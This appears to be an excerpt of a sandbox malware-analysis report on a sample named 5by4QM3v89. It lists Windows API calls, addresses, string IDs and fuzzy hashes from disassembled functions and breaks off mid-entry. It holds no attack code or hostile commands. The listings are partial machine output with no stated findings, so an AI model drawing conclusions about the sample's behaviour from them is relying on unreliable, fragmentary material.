                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: af1dbbd2c18d964f551ff5f10d16a40eee2940891c24c05e3732440a5875b16e
                                                          • Instruction ID: 6932b40562ee14af9cdc8e9b79c45af6503d74a73ceff2a98184500d94cfb1a3
                                                          • Opcode Fuzzy Hash: af1dbbd2c18d964f551ff5f10d16a40eee2940891c24c05e3732440a5875b16e
                                                          • Instruction Fuzzy Hash: E0618531500F00EFDB26AF15D959B2ABBF2FB44312F51843DE4428AAA1C770ACA5DB94
                                                          APIs
                                                            • Part of subcall function 003925DB: GetWindowLongW.USER32(?,000000EB), ref: 003925EC
                                                          • GetSysColor.USER32(0000000F), ref: 003921D3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: 6d5e46b3a73790fd7d318ed9fc5d9b78875bd1e2ba310821ed509f1fec39d87a
                                                          • Instruction ID: 58d2c91e1214dd447fec93d866133a8a4270b4e3ef037b3e0117817de7f2182c
                                                          • Opcode Fuzzy Hash: 6d5e46b3a73790fd7d318ed9fc5d9b78875bd1e2ba310821ed509f1fec39d87a
                                                          • Instruction Fuzzy Hash: 2841A331004954FBDF265F28EC88BBA3B66EB06731F158275FDA58A1E2C7318C42DB15
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,0041F910), ref: 003FA90B
                                                          • GetDriveTypeW.KERNEL32(00000061,004489A0,00000061), ref: 003FA9D5
                                                          • _wcscpy.LIBCMT ref: 003FA9FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-1000479233
                                                          • Opcode ID: cff58db420e238754a54f1b69017a581967c0697fb6ae98491c3e45d93cef42f
                                                          • Instruction ID: b480b1614d22b07ebd39c5b4a8bf21660e90f791101f95ec9ab5c6baac6658fa
                                                          • Opcode Fuzzy Hash: cff58db420e238754a54f1b69017a581967c0697fb6ae98491c3e45d93cef42f
                                                          • Instruction Fuzzy Hash: B151C0715187089BC706EF14C892ABFB7E5FF84304F11482EF6995B2A2DB71D909CA53
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __i64tow__itow__swprintf
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 421087845-2263619337
                                                          • Opcode ID: 960b568969a140eaf1f2225853a7c690cec76ad619f2c0812bb535f44ec81f5f
                                                          • Instruction ID: fad3f94a3c12bbfc01db4601a54b6f63e3b9612481ffa5918ceabcb1e40c7df8
                                                          • Opcode Fuzzy Hash: 960b568969a140eaf1f2225853a7c690cec76ad619f2c0812bb535f44ec81f5f
                                                          • Instruction Fuzzy Hash: E141B771504209AFEF26EF38D841FBA73E9EF06304F24446FE649DB691EA319D418710
                                                          APIs
                                                          • _memset.LIBCMT ref: 0041716A
                                                          • CreateMenu.USER32 ref: 00417185
                                                          • SetMenu.USER32(?,00000000), ref: 00417194
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00417221
                                                          • IsMenu.USER32(?), ref: 00417237
                                                          • CreatePopupMenu.USER32 ref: 00417241
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0041726E
                                                          • DrawMenuBar.USER32 ref: 00417276
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0$F
                                                          • API String ID: 176399719-3044882817
                                                          • Opcode ID: c8f24732164c76b00688c9e49dec3bdc6733ea51a6178b87282d3210de59ff58
                                                          • Instruction ID: 92f8c1bbdf3391fb6fef771b22cecdcea23380fabc0aa9a0e63642bd2c2fe8dd
                                                          • Opcode Fuzzy Hash: c8f24732164c76b00688c9e49dec3bdc6733ea51a6178b87282d3210de59ff58
                                                          • Instruction Fuzzy Hash: 06416574A01209EFDB20DFA4D884EEABBF6FF48310F14416AF905A7361D735A915CB98
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0041755E
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00417565
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00417578
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00417580
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0041758B
                                                          • DeleteDC.GDI32(00000000), ref: 00417594
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041759E
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004175B2
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004175BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: ad4a2699d4fe80a17cd61e302e9b09e40a10c9c8fc8fc0b60fdff6a1dff9b504
                                                          • Instruction ID: d69dc6086b0a0da875aff4240d52ec76869d2d534b54c8155846821a934e6e38
                                                          • Opcode Fuzzy Hash: ad4a2699d4fe80a17cd61e302e9b09e40a10c9c8fc8fc0b60fdff6a1dff9b504
                                                          • Instruction Fuzzy Hash: EB316A72104215BBDF129F64DC08FEB3FAAEF09364F114225FA15A61A0C735D856DBA8
                                                          APIs
                                                          • _memset.LIBCMT ref: 003B6E3E
                                                            • Part of subcall function 003B8B28: __getptd_noexit.LIBCMT ref: 003B8B28
                                                          • __gmtime64_s.LIBCMT ref: 003B6ED7
                                                          • __gmtime64_s.LIBCMT ref: 003B6F0D
                                                          • __gmtime64_s.LIBCMT ref: 003B6F2A
                                                          • __allrem.LIBCMT ref: 003B6F80
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B6F9C
                                                          • __allrem.LIBCMT ref: 003B6FB3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B6FD1
                                                          • __allrem.LIBCMT ref: 003B6FE8
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B7006
                                                          • __invoke_watson.LIBCMT ref: 003B7077
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                          • Instruction ID: fea0436b32602f51e8fa05fb02103732d8bc48e0663cb72ed0307d3f5c466ca8
                                                          • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                          • Instruction Fuzzy Hash: C571FC76A00716ABD716AF68DC42BDAB7B8EF44328F15812EF614DBA81E774DD008790
                                                          APIs
                                                          • _memset.LIBCMT ref: 003F2542
                                                          • GetMenuItemInfoW.USER32(00455890,000000FF,00000000,00000030), ref: 003F25A3
                                                          • SetMenuItemInfoW.USER32(00455890,00000004,00000000,00000030), ref: 003F25D9
                                                          • Sleep.KERNEL32(000001F4), ref: 003F25EB
                                                          • GetMenuItemCount.USER32(?), ref: 003F262F
                                                          • GetMenuItemID.USER32(?,00000000), ref: 003F264B
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 003F2675
                                                          • GetMenuItemID.USER32(?,?), ref: 003F26BA
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003F2700
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F2714
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F2735
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: a83d4bbacaabb443d7404c5b3dcf931bfc4ae0d60b21d0bc915c892c4627b3d0
                                                          • Instruction ID: 8095d5868a07832d873486eb8f0a3d6fef5853bb30d962771e4a72c519f7a4fe
                                                          • Opcode Fuzzy Hash: a83d4bbacaabb443d7404c5b3dcf931bfc4ae0d60b21d0bc915c892c4627b3d0
                                                          • Instruction Fuzzy Hash: 41618B7090024DEFDB12DFA4CC98DBFBBB9EB01304F154169EA41A7252D771AD0ADB21
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00416FA5
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00416FA8
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00416FCC
                                                          • _memset.LIBCMT ref: 00416FDD
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00416FEF
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00417067
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: 7db711dedc74ef29399fa6fedd341c421dbd1cbe95261599a4241af4601ddcd9
                                                          • Instruction ID: 0a671e43650e96508ffb9d5c0285e673cf446aa292bbbe5bfb35f06d95b7d9e3
                                                          • Opcode Fuzzy Hash: 7db711dedc74ef29399fa6fedd341c421dbd1cbe95261599a4241af4601ddcd9
                                                          • Instruction Fuzzy Hash: D2617D75900208AFDB11DFA4CC81EEE77F8EB09710F10416AFA14AB3A2C775AD85DB94
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003E6BBF
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 003E6C18
                                                          • VariantInit.OLEAUT32(?), ref: 003E6C2A
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 003E6C4A
                                                          • VariantCopy.OLEAUT32(?,?), ref: 003E6C9D
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 003E6CB1
                                                          • VariantClear.OLEAUT32(?), ref: 003E6CC6
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 003E6CD3
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E6CDC
                                                          • VariantClear.OLEAUT32(?), ref: 003E6CEE
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E6CF9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: eabeeb79193e251b4493465fb7dcd100afb9a757f79b0f66cab9f5efc122d10b
                                                          • Instruction ID: 5bf1aacc24a894dc0728bf3e5ca5f40de020c3643a657ec0a983c5c19bd5bb4a
                                                          • Opcode Fuzzy Hash: eabeeb79193e251b4493465fb7dcd100afb9a757f79b0f66cab9f5efc122d10b
                                                          • Instruction Fuzzy Hash: 94417131A001299FCF01DFA9D8459EEBBB9EF18354F00C179E955EB261CB30A946CB94
                                                          APIs
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                          • CoInitialize.OLE32 ref: 00408403
                                                          • CoUninitialize.OLE32 ref: 0040840E
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00422BEC,?), ref: 0040846E
                                                          • IIDFromString.OLE32(?,?), ref: 004084E1
                                                          • VariantInit.OLEAUT32(?), ref: 0040857B
                                                          • VariantClear.OLEAUT32(?), ref: 004085DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: 22ec7ae36a90eb028f3f9e21c9a1a615ce9ac82b1c6215d279f5bb87127d045a
                                                          • Instruction ID: 540d143a71b1d1c777ae706d5d2e3f6b812cd047a3545158b4dd0e6cf00f8c30
                                                          • Opcode Fuzzy Hash: 22ec7ae36a90eb028f3f9e21c9a1a615ce9ac82b1c6215d279f5bb87127d045a
                                                          • Instruction Fuzzy Hash: 6F61BD70608312AFC711DF14C948F6EB7E8AF49714F00442EF985AB291DB78ED49CB9A
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00405793
                                                          • inet_addr.WSOCK32(?,?,?), ref: 004057D8
                                                          • gethostbyname.WSOCK32(?), ref: 004057E4
                                                          • IcmpCreateFile.IPHLPAPI ref: 004057F2
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00405862
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00405878
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004058ED
                                                          • WSACleanup.WSOCK32 ref: 004058F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: e0af95b1f511913bbc1d11aec8610f30e4f7d80e622066d579db957aa0863739
                                                          • Instruction ID: bd82fdb4383a1c5357a667a7aaa4793577efc04c73602409aac952c07fb5532c
                                                          • Opcode Fuzzy Hash: e0af95b1f511913bbc1d11aec8610f30e4f7d80e622066d579db957aa0863739
                                                          • Instruction Fuzzy Hash: CC516C326046009FDB11AF24C845B6BB7E4EB49720F04893AF956EB2E1DB34E8059F4A
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003FB4D0
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003FB546
                                                          • GetLastError.KERNEL32 ref: 003FB550
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 003FB5BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 95621953c1e4df6e00840f40d65ec44fd3fc2eeebcc1098014c336579747f0dc
                                                          • Instruction ID: 1697e54ddbc6e60b266e4604006d558831ce33a387ada2847f6eb581f4c19cf4
                                                          • Opcode Fuzzy Hash: 95621953c1e4df6e00840f40d65ec44fd3fc2eeebcc1098014c336579747f0dc
                                                          • Instruction Fuzzy Hash: 38318275A0020DDFDB02EB68C845BBDB7B8EF46314F10416AF6099B291DB75DA42CB51
                                                          APIs
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                            • Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003E9014
                                                          • GetDlgCtrlID.USER32 ref: 003E901F
                                                          • GetParent.USER32 ref: 003E903B
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 003E903E
                                                          • GetDlgCtrlID.USER32(?), ref: 003E9047
                                                          • GetParent.USER32(?), ref: 003E9063
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 003E9066
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 03c301f937a0f248da1b3a4939db54e4491b7d14f2d343443713601b2317b6d9
                                                          • Instruction ID: 3cb4e157405b82b7f517eaaaeaa342389004ca679c11cef4dec55c41fec27d64
                                                          • Opcode Fuzzy Hash: 03c301f937a0f248da1b3a4939db54e4491b7d14f2d343443713601b2317b6d9
                                                          • Instruction Fuzzy Hash: 5D21D870A00208BBDF06ABA1CC85FFEB774EF49310F504226B511972E1DB75581ADB24
                                                          APIs
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                            • Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003E90FD
                                                          • GetDlgCtrlID.USER32 ref: 003E9108
                                                          • GetParent.USER32 ref: 003E9124
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 003E9127
                                                          • GetDlgCtrlID.USER32(?), ref: 003E9130
                                                          • GetParent.USER32(?), ref: 003E914C
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 003E914F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 592673dcef45e33fe55773a48f75c93dcd5c6f471645b3f67551d97db89a1e2f
                                                          • Instruction ID: 217b8bf9ef06d208227a38abf99a3ce6a3404f886b1e72a7b7168b36960d5b10
                                                          • Opcode Fuzzy Hash: 592673dcef45e33fe55773a48f75c93dcd5c6f471645b3f67551d97db89a1e2f
                                                          • Instruction Fuzzy Hash: 34210774A40208BBDF12ABA1CC85FFEBB78EF48300F504126F911972E1DB75985ADB20
                                                          APIs
                                                          • GetParent.USER32 ref: 003E916F
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 003E9184
                                                          • _wcscmp.LIBCMT ref: 003E9196
